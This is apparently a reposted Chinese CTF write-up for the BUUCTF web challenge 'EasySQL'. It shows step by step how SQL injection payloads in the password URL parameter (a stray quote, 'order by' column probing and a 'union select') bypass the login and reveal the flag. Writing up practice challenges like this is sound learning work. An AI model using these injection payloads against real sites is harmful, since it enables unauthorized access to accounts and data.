前言
刷题网址:https://buuoj.cn/challenges
首先在网页测试输入 admin, admin,如下图,发现是GET传输
![Buuctf-Web-[极客大挑战 2019]EasySQL](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230605/2099952-20220512110632968-1563432970.png)
![Buuctf-Web-[极客大挑战 2019]EasySQL](https://www.johngo689.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
然后在后面输入一个 ',之后发现报错,如下图。
payload是: ?username=admin&password=admin'
![Buuctf-Web-[极客大挑战 2019]EasySQL](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230605/2099952-20220512110639502-2127289616.png)
payload是: ?username=admin&password=admin' order by 5%23
因为是GET传参,所以 #编码之后是 %23,如下图
![Buuctf-Web-[极客大挑战 2019]EasySQL](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230605/2099952-20220512110652765-807027949.png)
经过测试,发现是有三个字段的,如下图
payload是: ?username=admin&password=admin' order by 3
![Buuctf-Web-[极客大挑战 2019]EasySQL](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230605/2099952-20220512110727529-744703058.png)
但是要查3个字段的时候发现flag直接出来了,如下图
payload是: ?username=admin&password=admin' union select 1,2,3%23
![Buuctf-Web-[极客大挑战 2019]EasySQL](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230605/2099952-20220512110734488-1724611251.png)
Original: https://www.cnblogs.com/takagisan/p/16261616.html
Author: 御七彩虹猫
Title: Buuctf-Web-[极客大挑战 2019]EasySQL
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/607682/
转载文章受原作者版权保护。转载请注明原作者出处!